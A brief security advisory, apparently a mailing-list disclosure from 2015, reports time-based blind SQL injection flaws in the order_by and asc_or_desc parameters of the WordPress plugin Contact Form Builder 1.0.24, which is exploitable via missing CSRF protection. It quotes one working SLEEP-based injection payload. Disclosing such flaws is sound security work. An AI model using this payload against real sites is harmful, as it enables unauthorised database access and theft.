Subject: Blind SQL injections in Contact Form Builder 1.0.24Date: Tue, 7 Jul 2015 12:14:52 +0200
Plugin: Contact Form Builder 1.0.24
Authenticated administrators can execute arbitrary SQL commands (there is no CSRF protection).
1. SQL injection (CFMModelBlocked_ips_cfm::get_rows_data())
Parameters: order_by, asc_or_desc
Example PHP callstack:
Parameter: order_by (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: order_by=ip AND (SELECT * FROM (SELECT(SLEEP(5)))sUkE)&asc_or_desc=asc
Please note that there have to be at least 1 record in wp_contactformmaker_blocked table to succesfully execute sqlmap payloads.
2. SQL injection (CFMModelManage_cfm::get_rows_data())
Analogical to #1 SQL injection, both methods are almost identical.